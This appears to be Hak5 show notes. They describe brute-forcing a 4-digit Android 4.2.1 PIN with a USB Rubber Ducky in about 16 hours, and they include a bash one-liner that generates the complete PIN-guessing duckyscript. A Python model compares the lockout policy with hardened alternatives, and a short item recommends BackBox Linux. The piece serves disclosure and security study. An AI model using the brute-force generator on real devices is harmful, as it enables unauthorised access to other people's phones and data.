Hack Any 4-digit Android PIN in 16 hours with a USB Rubber Ducky



This time on the show, an online brute force attack against Android successfully defeats 4-digit PIN codes in about 16 hours using the USB Rubber Ducky without wiping user data. Plus, BackBox Linux - is this a pen-testing OS for everyday use? All that and more, this time on Hak5.

Android Brute Force Attack with USB Rubber Ducky

Brute forcing Android PIN authentication with a USB Rubber Ducky. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it has run as expected.

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4-digit PIN and the default of 5 tries followed by a 30-second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5-digit, but that would take 166 hours. 10-digit would take 1902.2 years. ;-)

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
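
The arithmetic behind the 16.6-hour figure, as an added example (not from the original show notes): a small model of the lockout policy that reproduces the page's 4- and 5-digit numbers and compares them with two hardened policies, an escalating timeout and a wipe threshold. `LockoutPolicy`, `exhaust`, the doubling factor, the one-day cap and the 100-attempt wipe are illustrative assumptions, not Android settings taken from the page.

```python
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass
class LockoutPolicy:
    tries_per_window: int = 5          # from the page: 5 tries ...
    base_timeout_s: float = 30.0       # ... followed by a 30 second timeout
    backoff_factor: float = 1.0        # 1.0 = fixed timeout, as the page observed
    max_timeout_s: float = 86400.0     # assumed cap for an escalating timeout
    wipe_after: Optional[int] = None   # assumed: wipe after N failed attempts


def exhaust(digits: int, policy: LockoutPolicy,
            seconds_per_try: float = 0.0) -> Tuple[float, int, float]:
    """Return (seconds, attempts, fraction of keyspace covered) for sequential
    guessing until the keyspace is exhausted or the wipe threshold is hit."""
    keyspace = 10 ** digits
    limit = keyspace if policy.wipe_after is None else min(keyspace, policy.wipe_after)
    elapsed, attempts, timeout = 0.0, 0, policy.base_timeout_s
    while attempts < limit:
        batch = min(policy.tries_per_window, limit - attempts)
        attempts += batch
        elapsed += batch * seconds_per_try
        if batch == policy.tries_per_window:
            # A full window of failures triggers the lockout; the page's
            # estimate counts every window's timeout, so this does too.
            elapsed += timeout
            timeout = min(timeout * policy.backoff_factor, policy.max_timeout_s)
    return elapsed, attempts, attempts / keyspace


def report() -> None:
    policies = {
        "fixed 30 s (page)": LockoutPolicy(),
        "doubling, 1-day cap (assumed)": LockoutPolicy(backoff_factor=2.0),
        "wipe after 100 (assumed)": LockoutPolicy(wipe_after=100),
    }
    for name, policy in policies.items():
        secs, tries, frac = exhaust(4, policy)
        print(f"{name:32s} {secs / 3600:12.1f} h  {tries:6d} tries  {frac:6.1%} of PINs")


if __name__ == "__main__":
    report()
```

Under the fixed timeout the whole 4-digit keyspace falls in 60,000 seconds; with the assumed doubling timeout the same keyspace takes more than five years, and the assumed wipe threshold stops the search after 1% of PINs.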

BackBox Linux

Daniel says: Have you heard of BackBox? It's an Ubuntu-based OS with a focus on pen testing with an XFCE desktop. But, unlike BackTrack, it is actually functional as a day-to-day OS. I've been using it as my main OS for 5 months now and I truthfully believe it doesn't receive enough attention.

Download BackBox Linux